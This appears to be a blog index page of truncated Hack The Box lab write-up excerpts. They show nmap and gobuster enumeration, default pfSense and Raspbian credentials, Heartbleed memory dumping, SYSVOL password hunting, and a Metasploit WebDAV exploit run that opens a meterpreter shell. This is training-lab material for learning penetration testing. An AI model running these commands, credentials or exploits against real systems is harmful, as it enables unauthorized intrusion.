HTB Active

$ sudo nmap -A -T4 -p-
Let’s enumerate SMB resources using SMBMap.
$ smbmap -H
$ smbclient //
smb: > dir
This share seems to be a copy of SYSVOL. According to the information found in:
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Attack Methods for Gaining Domain Admin Rights in Active Directory
We need to find a file such as groups.xml, scheduledtasks.xml or Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e
We need to skip SSL certificate verification using the -k option.
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt
We’ve found 2 text documents: changelog.txt and system-users.txt. Company defaults? As we have a pfSense site, we can try the default pfSense password (pfsense).
Access to This

HTB Valentine

$ sudo nmap -T4 -A -p-
$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k
$ nikto -h
$ sudo nmap --script vuln -p 80
$ sudo nmap --script vuln -p 443
Based on these results, this box is vulnerable to Heartbleed.
$ python
$ strings dump.bin
Using Base64 decoding: aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== decodes to heartbleedbelievethehype
Access to
This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb
We just have an Apache on port 80 and OpenSSH on port 2222.
Access to http://shocker.htb
ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e
We have a cgi-bin folder that may contain script files. Let’s use Gobuster again, this time searching for files by extension (.sh, .py).
$ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh
Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb
If we access http://mirai.htb, there is another HTTP port. Access http://mirai.htb:32400 to be finally redirected to http://mirai.htb:32400/web/index.html. As described by the Nmap results, we have a Plex Media Server.
ruben@kali:~/htb/mirai$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e --wildcard
Access to http://mirai.htb/admin/
So, do we have a Raspberry Pi, maybe running Raspbian? Default Raspbian credentials are pi:raspberry. As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p-
There is an Apache 2.4.7 on port 80 and a DNS server on port 53. If you access it, there is an Apache2 default site. As there is an active DNS server, it may be worth adding the hostname to /etc/hosts. All HTB machines follow the same pattern: box_name.htb. After this step, if we access http://bank.htb we obtain a more promising site.
ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$ nmap -p- -T4 -A
Results:
$ gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k
Access to
So, this box contains an Elastix instance. According to the Wikipedia description: Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Arctic

$ sudo nmap -A -T4 -p-
8500/tcp open fmtp?
This is an odd open port. Let’s check it.
Access to
These files are part of a ColdFusion 8 installation.
$ searchsploit ColdFusion
$ searchsploit -x 14641
Access to
What is RDS? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP access to files and databases. You can use RDS to manage

HTB Blocky

$ nmap -T4 -p- -sV -A
Open Ports:
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open   minecraft Minecraft 1.11.2
http-generator: WordPress 4.8
$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
phpMyAdmin login site:
WordPress admin login site:
Uploads folder

HTB Granny

$ nmap -T4 -A -sV -p-
$ nmap -p 80 --script vuln
$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$ nikto -h
Based on Grandpa’s vulnerability…
msf5 > search CVE-2017-7269
msf5 > use 0
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > getuid
meterpreter > shell
c:\windows\system32\inetsrv>whoami
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getpid
meterpreter > ps